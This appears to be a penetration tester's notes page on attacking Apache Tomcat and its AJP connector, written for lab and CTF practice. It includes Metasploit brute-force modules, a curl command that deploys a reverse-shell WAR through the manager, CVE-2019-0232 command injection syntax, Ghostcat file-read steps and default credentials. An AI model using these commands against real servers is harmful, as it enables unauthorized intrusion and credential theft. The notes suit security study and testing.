Apache Tomcat

Apache Tomcat is an open-source web server. It provides a Java HTTP web server environment in which Java code can run.

The version 11 is still in development. The previous major versions are version 10 (2021), version 9 (2018), and version 8 (2016).

A java web application can use either or both servlets and JSPs. A combination of both is the most common architecture.

  • Servlets β˜•: the whole logic is in Java
  • JSP 🐲: html-like template files in which we can add Java logic to handle input and create interactive pages.

The admin panel to upload applications if usually at /manager/html. To upload an application, you need to package it as a WAR archive. Each app is deployed at a URI, and index.jsp is loaded by default (else error).


Pentester Notes ☠️

linuxprivilegeescalation attacking_common_applications jerry cozyhosting

  • You can try tomcatWarDeployer (0.4k ⭐, 2022 πŸͺ¦), but it's memory hungry, buggy, unstable, and you need to patch the code first πŸͺ¦. It's a multipurpose tool (from enumeration to exploitation, albeit basic).

Enumeration

bizness

  • You can use nmap. It often runs on port 8080.
$ sudo nmap IP -sCV -v
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
  • We can often easily recognize a website using Apache Tomcat from the presence of the JSESSIONID cookie while we may also trigger an error to see the error message page layout. Additionally, the URI /docs may be available and expose Tomcat version.

  • Maybe Sprint Boot Actuators are being used.

  • We can disclose tomcat version by sending a query using an invalid method that should raise a 405 (ex: curl -X PUT URL)

Foothold

  • If you close the login prompt, you may see default credentials

  • We can try to brute force the manager account using metasploit.

$ msfconsole -q
msf6> use auxiliary/scanner/http/tomcat_mgr_login
msf6> set RHOSTS <target>
msf6> set STOP_ON_SUCCESS true
msf6> set ANONYMOUS_LOGIN true
msf6> set BLANK_PASSWORDS true
msf6> run

Exploitation

  • If you have access to the manager, you can try to upload a reverse shell. Refer to reverse shell#tomcat for more information.

  • You can also try to use metasploit to upload a reverse shell

  • You can use cURL to upload a WAR too:

$ curl --upload-file revshell.war -u 'username:password' "URL/manager/text/deploy?path=/shell"

Well-known CVEs

attacking_common_applications adventofcyber2

  • CVE-2019-0232: on Windows host, if there is a cgi script and enableCmdLineArguments was enabled (default to disabled), it can be exploited to arbitrarily run commands.

You must find the CGI directory which is often /cgi or /cgi-bin/ and find at least one script. Use URL/xxx/yyy.bat?&dir to execute dir.

  • Use + instead of spaces. Use \ in paths.
  • Don't forgot to URL encode the payload.
  • Use redirections when needed (e.g. dir+>+output to create 'output').
  • Display environment variables using &set. If PATH is not set, you have to use the full path (e.g. c:\windows\system32\whoami.exe).

You can use the metasploit module tomcat_cgi_cmdlineargs.


Apache AJP

server_side_attacks

Apache AJP is a wire protocol. It allows a web server such as Apache to talk to tomcat. A few notes:

  • 🐲 It runs on port 8009/TCP (by default)
  • πŸͺ¦ It's not often exposed
  • πŸ“š We need to configure a webserver to communicate with it

While uncommon, if a tomcat website is behind a firewall, but the AJP port is exposed, we can use AJP to access the 'hidden' tomcat website.

AJP Exploitation

server_side_attacks ajp

  • We can use nginx with nginx_ajp_module
  • We can use Apache with proxy_ajp
  • We can use AJPy (0.5k ⭐)
$ git clone https://github.com/hypn0s/AJPy.git && cd AJPy
$ python tomcat.py --port 8009 "version" IP
<print tomcat manager version>

AJP Well-known CVEs

attacking_common_applications tomghost

  • CVE-2020-1938: unauthenticated LFI that can be used to read files in the webroot, such as WEB-INF/web.xml or WEB-INF/cgi/xxx.bat. Apache JServ which usually runs on port 8009 must be exposed.

It can be exploited using metasploit:

msf6> use auxiliary/admin/http/tomcat_ghostcat

The file web.xml contains the manager credentials if they were defined.


πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

  • apache-tomcat-pentesting
  • Jetty - it seems like an alternative
  • /manager/status server status (admin:admin)
  • not the same credentials on each page
  • when uploading, on the same page, there are information about the server architecture, which we can use to fine tune the payload
  • jar -ft revshell.jar/jd-gui: to see metasploit endpoint name
  • when pressing ESC on login, it may print the message with the default credentials
  • /etc/tomcat9/<config files>
  • web.xml, tomcat-users.xml
  • SESSIONS.ser

While not really related:

bizness

  • /control/xmlrpc, /webtools/control/main, /control/checkLogin
  • Try default credentials (admin:ofbiz)
  • CVE-2023-50164 lead to RCE